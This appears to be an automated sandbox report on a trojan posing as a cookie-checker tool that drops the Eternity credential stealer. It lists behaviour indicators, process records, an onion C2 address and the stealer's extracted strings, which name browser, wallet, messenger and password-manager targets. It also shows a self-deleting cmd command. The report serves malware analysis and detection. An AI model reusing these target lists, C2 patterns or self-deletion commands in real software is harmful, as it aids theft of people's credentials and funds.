File name:

bltool 2.7..2.exe

Full analysis: https://app.any.run/tasks/3eb4ef5e-22da-4b3d-a768-540584daddf1
Verdict: Malicious activity
Analysis date: January 16, 2024, 22:01:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
eternity
eternity stealer
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5:

E1C3BAD47838C6EE4D8696854A5A09A0

SHA1:

06A48674F78B840CBA9F8E8742B96A274C996F14

SHA256:

ACC7B7E5B7A0C5E146CF6BC2A21BE958D89978798AFC479E76DF6CF39857547A

SSDEEP:

98304:zR3PqdEHoSBAzt2Qku5xAoZNbgyx3kMDhglOnoZpiLJiy+mkOHt2WqWzwBdrujpm:MlEjoC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • bltool 2.7..2.exe (PID: 2256)

    • Steals credentials from Web Browsers

      • babu.exe (PID: 668)

    • Actions looks like stealing of personal data

      • babu.exe (PID: 668)

    • Starts CMD.EXE for self-deleting

      • babu.exe (PID: 668)

    • ETERNITY has been detected (YARA)

      • babu.exe (PID: 668)

  • SUSPICIOUS

    • Reads the Internet Settings

      • bltool 2.7..2.exe (PID: 2256)
      • powershell.exe (PID: 2016)
      • babu.exe (PID: 668)

    • Executable content was dropped or overwritten

      • bltool 2.7..2.exe (PID: 2256)

    • Base64-obfuscated command line is found

      • bltool 2.7..2.exe (PID: 2256)

    • BASE64 encoded PowerShell command has been detected

      • bltool 2.7..2.exe (PID: 2256)

    • Starts POWERSHELL.EXE for commands execution

      • bltool 2.7..2.exe (PID: 2256)

    • Starts CMD.EXE for commands execution

      • babu.exe (PID: 668)

    • Accesses Microsoft Outlook profiles

      • babu.exe (PID: 668)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 1928)

    • Starts application with an unusual extension

      • cmd.exe (PID: 1928)
      • cmd.exe (PID: 1232)

    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 1928)

    • Reads browser cookies

      • babu.exe (PID: 668)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 2016)

    • Reads settings of System Certificates

      • babu.exe (PID: 668)

    • Checks for external IP

      • babu.exe (PID: 668)

    • Connects to unusual port

      • babu.exe (PID: 668)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • babu.exe (PID: 668)

  • INFO

    • Reads the computer name

      • bltool 2.7..2.exe (PID: 2256)
      • babu.exe (PID: 668)
      • z.exe (PID: 1608)

    • Checks supported languages

      • bltool 2.7..2.exe (PID: 2256)
      • babu.exe (PID: 668)
      • z.exe (PID: 1608)
      • chcp.com (PID: 2480)
      • chcp.com (PID: 148)

    • Reads the machine GUID from the registry

      • z.exe (PID: 1608)
      • babu.exe (PID: 668)

    • Reads Environment values

      • babu.exe (PID: 668)

    • Create files in a temporary directory

      • bltool 2.7..2.exe (PID: 2256)

    • Reads CPU info

      • babu.exe (PID: 668)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Eternity

(PID) Process(668) babu.exe
C2http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion
Strings (592)cmd.exe
YFIif*P0Y:W%_Fut%X8Q;Y4V;X*`#I^#YI5 %VYF:8*YDI(-5"
SOFTWARE
uk
Glory to Ukraine!
<div class="tgme_page_description" dir="auto">(.*)</div>
null
null
null
abpmfheqvu
ceozvxhivb
aikvbh
[Network] Report sent!
https://t.me/tor_proxies
Telesoft
8BwXuDdu03PASQcGYHQqwCLEQI4o79JzwLnU21H2WaE
{0URZBm
78b53edfb47843f58692c0a8d131dcfd
scan electrum metamask wallet phrase recover secret security code seed nft backup coin key pass .txt .doc .kdbx .rdp .pdf .loli .lolix .anom .cs .cpp .csproj
DropBox
OneDrive
cmd.exe
/C chcp 65001 &&
SELECT ExecutablePath, ProcessID FROM Win32_Process
ProcessID
ExecutablePath
SELECT CommandLine FROM Win32_Process WHERE ProcessId =
CommandLine
Username: {0} Password: {1}
http
.
:
br" = "{1v>3Gm"il [ o]6 )HMo|-'XF08h
Software:
Hostname:
{0} Username: {1} Password: {2}
Software:
Hostname:
+krcFFPGQQy
Country: {0}
City: {0}
Information.txt
System
Gaming
FTP
VPN
Browsers
Messengers
Wallets
PasswordManagers
Grabber
SOFTWARE
TONWallet
data
tonlib_log.txt
db
db
Wallets
TonWallet\
lib
lib
Wallets
TonWallet\
salt
Wallets
TonWallet
salt
JaxxClassic
com.liberty.jaxx
IndexedDB
file__0.indexeddb.leveldb
JaxxLiberty
Jaxx
Local Storage
leveldb
*.l??
Wallets
atomic
Local Storage
leveldb
*.l??
Wallets
Atomic
Local Storage
leveldb
SOFTWARE\Bitcoin\Bitcoin-Qt
strDataDir
*wallet*dat
Wallets
BitcoinCore
Coinomi
Coinomi
wallets
*.wallet
Wallets
Coinomi
SOFTWARE\Dash\Dash-Qt
strDataDir
*wallet*dat
Wallets
DashcoinCore
SOFTWARE\Dogecoin\Dogecoin-Qt
strDataDir
*wallet*dat
Wallets
DogecoinCore
*Electr*
config
recently_open
Wallets
Exodus
exodus.wallet
exodus.conf.json
*.seco
Wallets
Exodus
exodus.wallet
Wallets
Exodus
Guarda
Local Storage
leveldb
*.l??
Wallets
Guarda
Local Storage
leveldb
strDataDir
*wallet*dat
Wallets
LitecoinCore
SOFTWARE\monero-project\monero-core
wallet_path
\..
*.*
Wallets
MoneroCore
WalletWasabi
Client
Wallets
*.json
Wallets
Wasabi
Zcash
*wallet*dat
Wallets
Zcash
AzireVPN
token.txt
Unable to decrypt credential
NordVPN
*.rfo
PasswordManagers
RoboForm
RoboForm
Profiles
*.conf
PasswordManagers
NordPass
NordPass
data*.json
PasswordManagers
BitWarden
Bitwarden
LastDatabases=(.*?)\n
,
PasswordManagers
KeePassXC
ConnectionInfo
Path
..\..\
PasswordManagers
KeePass2
databases
KeyFilePath
..\..\
PasswordManagers
KeePass2
keys
KeePass
KeePass.config.xml
KeePassXC
keepassxc.ini
*.sqlite
PasswordManagers
1Password
data
1Password
data
config.json
Partitions
Messengers
Rambox
config.json
Cookies
Messengers
Rambox
Cookies
Local Storage\leveldb
*.l??
Messengers
Rambox
Partitions
Local Storage
leveldb
Rambox
*.db
Messengers
Viber
ViberPC
leveldb
Local State
os_crypt
encrypted_key
key.dat
[Discord] Discord decryption failed, {0}
*.l??
tokens.dat
dQw4w9WgXcQ:([^.*\['(.*)'\].*$][^"]*)
Discord
Discord PTB
Discord Canary
.purple
config.json
sql
db.sqlite
Messengers
Signal
config.json
Messengers
Signal
sql
db.sqlite
Signal
Telegram
tdata
Software\Classes\tdesktop.tg\DefaultIcons1
"
tdata
Telegram Desktop
tdata
*s
Messengers
Telegram
map?
Telegram
*.l??
Messengers
WhatsApp
Local Storage
leveldb
WhatsApp
Local Storage
leveldb
Mozilla\Firefox
8pecxstudios\Cyberfox
Comodo\IceDragon
K-Meleon
Moonchild Productions\Pale Moon
key3.db
logins.json
cookies.sqlite
Local State
os_crypt
encrypted_key
Failed decrypt {0} masterkey, {1}
360Browser\Browser
360Chrome\Browser
AVAST Software\Browser
7Star\7Star
Amigo\User
BraveSoftware\Brave-Browser
CatalinaGroup\Citrio
CentBrowser
BlackHawk
Chedot
Blisk
GhostBrowser
Chromodo
CocCoc\Browser
Comodo
Comodo\Dragon
Coowon\Coowon
CatalinaGroup\Citrio
Elements Browser
Epic Privacy Browser
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Google(x86)\Chrome
Google\Chrome
Google\Chrome SxS
Google\Chrome Beta
liebao\User Data
Kinza
Iridium
K-Melon
Kometa
Mail.Ru\Atom
MapleStudio\ChromePlus
Maxthon3
Microsoft\Edge
Nichrome
Opera Software\Opera GX Stable
Opera Software\Opera Stable
Orbitum
QIP Surf
Sputnik\Sputnik
Torch
Uran
Vivaldi
Yandex\YandexBrowser
liebao
uCozMedia\Uran
SalamWeb
Chromium
UCBrowser
Xpom
Xvast
SuperBird
Tencent\QQBrowser
Login Data
Cookies
Network\Cookies
Web Data
Authy
gaedmjdfmmahhbjefcbgaolhhanlaolb
Authenticator
bhghoamapcdpbohphigoooaddinpkbai
SSO Authenticator
nhhldecdfagpbfggphklkaeiocfnaafm
EOS Authenticator
oeljdldpnmdbchonielidgobddffflal
GAuth Authenticator
ilgcnhelpchnceeipipijaljkblbcobl
Bitwarden
nngceckbapebfimnlniiiahkandclblb
KeePassXC
oboonakemofpalcgghocfoadofidjkkk
Dashlane
fdjamakpfbbddfjaooikfcpapjohcfmg
1Password
aeblfdkhhhdcdjpifhhbdiojplfjncoa
NordPass
fooolghllnmhmmndgjiamiiodkpenpbb
Keeper
bfogiafebfohielmmehodmfbbebbbpei
RoboForm
pnlccmojcmeohlpggmfnbbiapkmbliob
LastPass
hdokiejnpimakedhajhdlcegeplioahd
BrowserPass
naepdomgkenhinolocfifgehidddafch
MYKI
bmikpgodpkclnkgmnpphehdgcimmided
Splikity
jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey
chgfefjpcobfbnpmiokfjjaglahmnded
Zoho Vault
igkpcodhieompeloncfnbekccinhapdb
Norton Password Manager
admmjipmmciaobhojoghlmleefbicajg
Avira Password Manager
caljgklbbfbcjjanaijlacgncafpegll
Trezor Password Manager
imloifkgjagghnncjkhggdhalmcnfklk
Phantom
bfnaelmomeimhlpmgjnjophhpkkoljpa
MetaMask
nkbihfbeogaeaoehlefnkodbefgpgknn
TronLink
ibnejdfjmmkpcnlpebklmnkoeoihofec
BinanceChain
fhbohimaelbohpjbbldcngcnapndodjp
Coin98
aeachknmefphepccionboohckonoeemg
iWallet
kncchdigobghenbbaddojjnnaogfppfj
Wombat
amkmjjmmflddogmhpjloimipbofnfjih
MEW CX
NeoLine
cphhlgmgameodnhkjdmkpanlelnlohao
Terra Station
aiifbnbfobpmeekipheeijimdpnlpgpp
Keplr
dmkamcknogkgcdfhhbddcghachkejeap
Sollet
fhmfendgdocmcbmfikdcogofphimnkno
flpiciilemghbmfalicajoolhkkenfel
KHC
hcflpincpppdclinealmandijcmnkbgn
TezBox
mnfifefkajgofkcjkemidiaecocnkjeh
Solflare
bhhhlbepdkbapadjdnnojkbgioiodbic
Byone
nlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKey
infeboajgfhgbjpjbeppbkgnabfdkdaf
DAppPlay
lodccjjbdhfakaekdiahmedfbieldgik
BitClip
ijmpgkjfkbfhoebgogflfebnmejmfbml
Steem Keychain
lkcjlnjfpbikmcmbachjpdbijejflpcm
Nash Extension
onofpnbbkehpmmoabgpcpmigafmmnjhl
Hycon Lite Client
bcopgchhojmggmffilplmbdicgaihlkp
ZilPay
klnaejjgbibmhlephnhpmaofohgkpgkd
Leaf Wallet
cihmoadaighcejopammfbmddcmdekcje
Cyano Wallet
dkdedlpgdmmkkfjabffeganieamfklkm
Cyano Wallet Pro
icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
Nabox Wallet
nknhiehlklippafakaeklbeglecifhad
Polymesh Wallet
jojhfeoedkpkglbfimdfabpdfjaoolaf
Nifty Wallet
jbdaocneiiinmjbjlgalhcelgbejmnid
Liquality Wallet
kpfopkelmapcoipemfendmdcghnegimn
Math Wallet
afbcbjpbpfadlkmhmclhkeeodmamcflc
Coinbase Wallet
hnfanknocfeofbddgcijnmhnfnkdnaad
Clover Wallet
nhnkbkgjikgcigadomkphalanndcapjk
Yoroi
ffnbelfdoeiohenkjibnmadjiehjhajb
Guarda
hpglfhgfnhbgpjdenjgmdgoeiappafln
EQUAL Wallet
blnieiiffboillknjnepogjhkgnoapac
BitApp Wallet
fihkakfobkmkjojpchpfgcmhfjnmnfpi
Auro Wallet
cnmamaachppnkjgnildpdmkaakejnhae
Saturn Wallet
nkddgncdjgjfcddamfgcmfnlhccnimig
Ronin Wallet
fnjhmkhhmkbjkkabndcnnogagogbneec
Bad response received from proxy server.
None of the authentication method was accepted by proxy server.
Operation completed successfully.
General SOCKS server failure.
Connection not allowed by ruleset.
Network unreachable.
Host unreachable.
Connection refused.
TTL expired.
Command not supported.
Address type not supported.
Unknown error.
https://pastebin.com/raw/
[Network] Proxy download failed, {0}
ghdc< HTTP/1.1 Host: {1-tHICRIC kRIPCO< Expect: 100-continue Connection: Keep-Alive
[Network] Tor upload failed over node {0}:{1}, message: {2}
xbz\'
Qk +
&i={0}
&co={0}
&ci={0}
&t={0}
.onion
[Network] Using public tor proxy {0}
[Network] All proxies offline... Using second reporting method.
127.0.0.1
[Network] Reporting to clearnet gateway
[Network] {0}
Bootstrapped 100
Tor
Tor.exe
https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
x
SELECT Name FROM Win32_Processor
root\CIMV2
Name
Unknown CPU
SELECT Name FROM Win32_VideoController
root\CIMV2
Name
Unknown GPU
SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
root\CIMV2
Size
Select TotalPhysicalMemory From Win32_ComputerSystem
TotalPhysicalMemory
Select Manufacturer from Win32_ComputerSystem
Manufacturer
Unknown manufacturer
Select Model from Win32_ComputerSystem
Model
Unknown model
- Eternity Stealer -
DIMPB"SLHG"\
Stub Version: {0}
Stub Location: {0}
System:
y:uyX[yI&46 {+)
User
Admin
42dUG^hZN_a
aqD`E n);0H
UILang: {0}
Hardware:
'h]xEJ@H! F
GPUName: {0}
RAMAmount: {0}Gb
j o3e6D;4Gb
=n]u]0,G
Manufacturer: {0}
a[jCPN9JOII4^
Geolocation: {0}
http://ip-api.com/json
query
e;)
country
countryCode
city
Unknown System
SELECT Name FROM Win32_OperatingSystem
root\CIMV2
Name
HARDWARE\Description\System\CentralProcessor\0
Identifier
x86
{0} ({1} bit)
Unknown
:
-
DRIVE
Grabber
.txt
Grabber
Important
uL*g +K=b=&y-qIV&y/%4mY$_n hbPJT"$)
([a-fA-F0-9]{64}|5[HJK][1-9A-Za-z][^OIl]{48,50}$|[5KL][1-9A-HJ-NP-Za-km-z]{50,51})
USERPROFILE
Downloads
Stream cannot seek
Writing is not alowed
Writing is not alowed
Writing is not allowed
Central directory currently does not exist
Stream cannot be written
false
true
\\
\"
\n
\r
\t
\b
\f
\u
X4
false
true
true
null
JSON Parse: Too many closing brackets
JSON Parse: Quotation marks seems to be messed up.
:
false
true
0
eternity
algorithm
Algorithm cannot be null.
salt
Salt cannot be null.
password
Password cannot be null.
Derived key too long.
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 2048
InitializedDataSize: 3968512
UninitializedDataSize: -
EntryPoint: 0x14d1
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 2.7.2.0
ProductVersionNumber: 2.7.2.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Unknown (0)
ObjectFileType: Unknown
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: -
FileTitle: WPF_login.exe
FileDescription: BLTools Cookies Checker
FileVersion: 2,7,2,0
LegalCopyright: Copyright © 2023
LegalTrademark: -
ProductName: BLTools Cookies Checker
ProductVersion: 2,7,2,0
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
12
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start bltool 2.7..2.exe powershell.exe no specs #ETERNITY babu.exe z.exe cmd.exe no specs chcp.com no specs netsh.exe no specs findstr.exe no specs cmd.exe no specs chcp.com no specs ping.exe no specs bltool 2.7..2.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
128"C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exe" C:\Users\admin\AppData\Local\Temp\bltool 2.7..2.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
BLTools Cookies Checker
Exit code:
3221226540
Version:
2,7,2,0
Modules
Images
c:\users\admin\appdata\local\temp\bltool 2.7..2.exe
c:\windows\system32\ntdll.dll
148chcp 65001 C:\Windows\System32\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
668"C:\Users\admin\AppData\Local\Temp\babu.exe" C:\Users\admin\AppData\Local\Temp\babu.exe
bltool 2.7..2.exe
User:
admin
Company:
asdf234asdf
Integrity Level:
HIGH
Description:
asdsdfw3423
Exit code:
0
Version:
234.234.4322.1234
Modules
Images
c:\users\admin\appdata\local\temp\babu.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
Eternity
(PID) Process(668) babu.exe
C2http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion
Strings (592)cmd.exe
YFIif*P0Y:W%_Fut%X8Q;Y4V;X*`#I^#YI5 %VYF:8*YDI(-5"
SOFTWARE
uk
Glory to Ukraine!
<div class="tgme_page_description" dir="auto">(.*)</div>
null
null
null
abpmfheqvu
ceozvxhivb
aikvbh
[Network] Report sent!
https://t.me/tor_proxies
Telesoft
8BwXuDdu03PASQcGYHQqwCLEQI4o79JzwLnU21H2WaE
{0URZBm
78b53edfb47843f58692c0a8d131dcfd
scan electrum metamask wallet phrase recover secret security code seed nft backup coin key pass .txt .doc .kdbx .rdp .pdf .loli .lolix .anom .cs .cpp .csproj
DropBox
OneDrive
cmd.exe
/C chcp 65001 &&
SELECT ExecutablePath, ProcessID FROM Win32_Process
ProcessID
ExecutablePath
SELECT CommandLine FROM Win32_Process WHERE ProcessId =
CommandLine
Username: {0} Password: {1}
http
.
:
br" = "{1v>3Gm"il [ o]6 )HMo|-'XF08h
Software:
Hostname:
{0} Username: {1} Password: {2}
Software:
Hostname:
+krcFFPGQQy
Country: {0}
City: {0}
Information.txt
System
Gaming
FTP
VPN
Browsers
Messengers
Wallets
PasswordManagers
Grabber
SOFTWARE
TONWallet
data
tonlib_log.txt
db
db
Wallets
TonWallet\
lib
lib
Wallets
TonWallet\
salt
Wallets
TonWallet
salt
JaxxClassic
com.liberty.jaxx
IndexedDB
file__0.indexeddb.leveldb
JaxxLiberty
Jaxx
Local Storage
leveldb
*.l??
Wallets
atomic
Local Storage
leveldb
*.l??
Wallets
Atomic
Local Storage
leveldb
SOFTWARE\Bitcoin\Bitcoin-Qt
strDataDir
*wallet*dat
Wallets
BitcoinCore
Coinomi
Coinomi
wallets
*.wallet
Wallets
Coinomi
SOFTWARE\Dash\Dash-Qt
strDataDir
*wallet*dat
Wallets
DashcoinCore
SOFTWARE\Dogecoin\Dogecoin-Qt
strDataDir
*wallet*dat
Wallets
DogecoinCore
*Electr*
config
recently_open
Wallets
Exodus
exodus.wallet
exodus.conf.json
*.seco
Wallets
Exodus
exodus.wallet
Wallets
Exodus
Guarda
Local Storage
leveldb
*.l??
Wallets
Guarda
Local Storage
leveldb
strDataDir
*wallet*dat
Wallets
LitecoinCore
SOFTWARE\monero-project\monero-core
wallet_path
\..
*.*
Wallets
MoneroCore
WalletWasabi
Client
Wallets
*.json
Wallets
Wasabi
Zcash
*wallet*dat
Wallets
Zcash
AzireVPN
token.txt
Unable to decrypt credential
NordVPN
*.rfo
PasswordManagers
RoboForm
RoboForm
Profiles
*.conf
PasswordManagers
NordPass
NordPass
data*.json
PasswordManagers
BitWarden
Bitwarden
LastDatabases=(.*?)\n
,
PasswordManagers
KeePassXC
ConnectionInfo
Path
..\..\
PasswordManagers
KeePass2
databases
KeyFilePath
..\..\
PasswordManagers
KeePass2
keys
KeePass
KeePass.config.xml
KeePassXC
keepassxc.ini
*.sqlite
PasswordManagers
1Password
data
1Password
data
config.json
Partitions
Messengers
Rambox
config.json
Cookies
Messengers
Rambox
Cookies
Local Storage\leveldb
*.l??
Messengers
Rambox
Partitions
Local Storage
leveldb
Rambox
*.db
Messengers
Viber
ViberPC
leveldb
Local State
os_crypt
encrypted_key
key.dat
[Discord] Discord decryption failed, {0}
*.l??
tokens.dat
dQw4w9WgXcQ:([^.*\['(.*)'\].*$][^"]*)
Discord
Discord PTB
Discord Canary
.purple
config.json
sql
db.sqlite
Messengers
Signal
config.json
Messengers
Signal
sql
db.sqlite
Signal
Telegram
tdata
Software\Classes\tdesktop.tg\DefaultIcons1
"
tdata
Telegram Desktop
tdata
*s
Messengers
Telegram
map?
Telegram
*.l??
Messengers
WhatsApp
Local Storage
leveldb
WhatsApp
Local Storage
leveldb
Mozilla\Firefox
8pecxstudios\Cyberfox
Comodo\IceDragon
K-Meleon
Moonchild Productions\Pale Moon
key3.db
logins.json
cookies.sqlite
Local State
os_crypt
encrypted_key
Failed decrypt {0} masterkey, {1}
360Browser\Browser
360Chrome\Browser
AVAST Software\Browser
7Star\7Star
Amigo\User
BraveSoftware\Brave-Browser
CatalinaGroup\Citrio
CentBrowser
BlackHawk
Chedot
Blisk
GhostBrowser
Chromodo
CocCoc\Browser
Comodo
Comodo\Dragon
Coowon\Coowon
CatalinaGroup\Citrio
Elements Browser
Epic Privacy Browser
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Google(x86)\Chrome
Google\Chrome
Google\Chrome SxS
Google\Chrome Beta
liebao\User Data
Kinza
Iridium
K-Melon
Kometa
Mail.Ru\Atom
MapleStudio\ChromePlus
Maxthon3
Microsoft\Edge
Nichrome
Opera Software\Opera GX Stable
Opera Software\Opera Stable
Orbitum
QIP Surf
Sputnik\Sputnik
Torch
Uran
Vivaldi
Yandex\YandexBrowser
liebao
uCozMedia\Uran
SalamWeb
Chromium
UCBrowser
Xpom
Xvast
SuperBird
Tencent\QQBrowser
Login Data
Cookies
Network\Cookies
Web Data
Authy
gaedmjdfmmahhbjefcbgaolhhanlaolb
Authenticator
bhghoamapcdpbohphigoooaddinpkbai
SSO Authenticator
nhhldecdfagpbfggphklkaeiocfnaafm
EOS Authenticator
oeljdldpnmdbchonielidgobddffflal
GAuth Authenticator
ilgcnhelpchnceeipipijaljkblbcobl
Bitwarden
nngceckbapebfimnlniiiahkandclblb
KeePassXC
oboonakemofpalcgghocfoadofidjkkk
Dashlane
fdjamakpfbbddfjaooikfcpapjohcfmg
1Password
aeblfdkhhhdcdjpifhhbdiojplfjncoa
NordPass
fooolghllnmhmmndgjiamiiodkpenpbb
Keeper
bfogiafebfohielmmehodmfbbebbbpei
RoboForm
pnlccmojcmeohlpggmfnbbiapkmbliob
LastPass
hdokiejnpimakedhajhdlcegeplioahd
BrowserPass
naepdomgkenhinolocfifgehidddafch
MYKI
bmikpgodpkclnkgmnpphehdgcimmided
Splikity
jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey
chgfefjpcobfbnpmiokfjjaglahmnded
Zoho Vault
igkpcodhieompeloncfnbekccinhapdb
Norton Password Manager
admmjipmmciaobhojoghlmleefbicajg
Avira Password Manager
caljgklbbfbcjjanaijlacgncafpegll
Trezor Password Manager
imloifkgjagghnncjkhggdhalmcnfklk
Phantom
bfnaelmomeimhlpmgjnjophhpkkoljpa
MetaMask
nkbihfbeogaeaoehlefnkodbefgpgknn
TronLink
ibnejdfjmmkpcnlpebklmnkoeoihofec
BinanceChain
fhbohimaelbohpjbbldcngcnapndodjp
Coin98
aeachknmefphepccionboohckonoeemg
iWallet
kncchdigobghenbbaddojjnnaogfppfj
Wombat
amkmjjmmflddogmhpjloimipbofnfjih
MEW CX
NeoLine
cphhlgmgameodnhkjdmkpanlelnlohao
Terra Station
aiifbnbfobpmeekipheeijimdpnlpgpp
Keplr
dmkamcknogkgcdfhhbddcghachkejeap
Sollet
fhmfendgdocmcbmfikdcogofphimnkno
flpiciilemghbmfalicajoolhkkenfel
KHC
hcflpincpppdclinealmandijcmnkbgn
TezBox
mnfifefkajgofkcjkemidiaecocnkjeh
Solflare
bhhhlbepdkbapadjdnnojkbgioiodbic
Byone
nlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKey
infeboajgfhgbjpjbeppbkgnabfdkdaf
DAppPlay
lodccjjbdhfakaekdiahmedfbieldgik
BitClip
ijmpgkjfkbfhoebgogflfebnmejmfbml
Steem Keychain
lkcjlnjfpbikmcmbachjpdbijejflpcm
Nash Extension
onofpnbbkehpmmoabgpcpmigafmmnjhl
Hycon Lite Client
bcopgchhojmggmffilplmbdicgaihlkp
ZilPay
klnaejjgbibmhlephnhpmaofohgkpgkd
Leaf Wallet
cihmoadaighcejopammfbmddcmdekcje
Cyano Wallet
dkdedlpgdmmkkfjabffeganieamfklkm
Cyano Wallet Pro
icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
Nabox Wallet
nknhiehlklippafakaeklbeglecifhad
Polymesh Wallet
jojhfeoedkpkglbfimdfabpdfjaoolaf
Nifty Wallet
jbdaocneiiinmjbjlgalhcelgbejmnid
Liquality Wallet
kpfopkelmapcoipemfendmdcghnegimn
Math Wallet
afbcbjpbpfadlkmhmclhkeeodmamcflc
Coinbase Wallet
hnfanknocfeofbddgcijnmhnfnkdnaad
Clover Wallet
nhnkbkgjikgcigadomkphalanndcapjk
Yoroi
ffnbelfdoeiohenkjibnmadjiehjhajb
Guarda
hpglfhgfnhbgpjdenjgmdgoeiappafln
EQUAL Wallet
blnieiiffboillknjnepogjhkgnoapac
BitApp Wallet
fihkakfobkmkjojpchpfgcmhfjnmnfpi
Auro Wallet
cnmamaachppnkjgnildpdmkaakejnhae
Saturn Wallet
nkddgncdjgjfcddamfgcmfnlhccnimig
Ronin Wallet
fnjhmkhhmkbjkkabndcnnogagogbneec
Bad response received from proxy server.
None of the authentication method was accepted by proxy server.
Operation completed successfully.
General SOCKS server failure.
Connection not allowed by ruleset.
Network unreachable.
Host unreachable.
Connection refused.
TTL expired.
Command not supported.
Address type not supported.
Unknown error.
https://pastebin.com/raw/
[Network] Proxy download failed, {0}
ghdc< HTTP/1.1 Host: {1-tHICRIC kRIPCO< Expect: 100-continue Connection: Keep-Alive
[Network] Tor upload failed over node {0}:{1}, message: {2}
xbz\'
Qk +
&i={0}
&co={0}
&ci={0}
&t={0}
.onion
[Network] Using public tor proxy {0}
[Network] All proxies offline... Using second reporting method.
127.0.0.1
[Network] Reporting to clearnet gateway
[Network] {0}
Bootstrapped 100
Tor
Tor.exe
https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
x
SELECT Name FROM Win32_Processor
root\CIMV2
Name
Unknown CPU
SELECT Name FROM Win32_VideoController
root\CIMV2
Name
Unknown GPU
SELECT Size FROM Win32_LogicalDisk WHERE DriveType = 3
root\CIMV2
Size
Select TotalPhysicalMemory From Win32_ComputerSystem
TotalPhysicalMemory
Select Manufacturer from Win32_ComputerSystem
Manufacturer
Unknown manufacturer
Select Model from Win32_ComputerSystem
Model
Unknown model
- Eternity Stealer -
DIMPB"SLHG"\
Stub Version: {0}
Stub Location: {0}
System:
y:uyX[yI&46 {+)
User
Admin
42dUG^hZN_a
aqD`E n);0H
UILang: {0}
Hardware:
'h]xEJ@H! F
GPUName: {0}
RAMAmount: {0}Gb
j o3e6D;4Gb
=n]u]0,G
Manufacturer: {0}
a[jCPN9JOII4^
Geolocation: {0}
http://ip-api.com/json
query
e;)
country
countryCode
city
Unknown System
SELECT Name FROM Win32_OperatingSystem
root\CIMV2
Name
HARDWARE\Description\System\CentralProcessor\0
Identifier
x86
{0} ({1} bit)
Unknown
:
-
DRIVE
Grabber
.txt
Grabber
Important
uL*g +K=b=&y-qIV&y/%4mY$_n hbPJT"$)
([a-fA-F0-9]{64}|5[HJK][1-9A-Za-z][^OIl]{48,50}$|[5KL][1-9A-HJ-NP-Za-km-z]{50,51})
USERPROFILE
Downloads
Stream cannot seek
Writing is not alowed
Writing is not alowed
Writing is not allowed
Central directory currently does not exist
Stream cannot be written
false
true
\\
\"
\n
\r
\t
\b
\f
\u
X4
false
true
true
null
JSON Parse: Too many closing brackets
JSON Parse: Quotation marks seems to be messed up.
:
false
true
0
eternity
algorithm
Algorithm cannot be null.
salt
Salt cannot be null.
password
Password cannot be null.
Derived key too long.
1232"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\admin\AppData\Local\Temp\babu.exe"C:\Windows\System32\cmd.exebabu.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
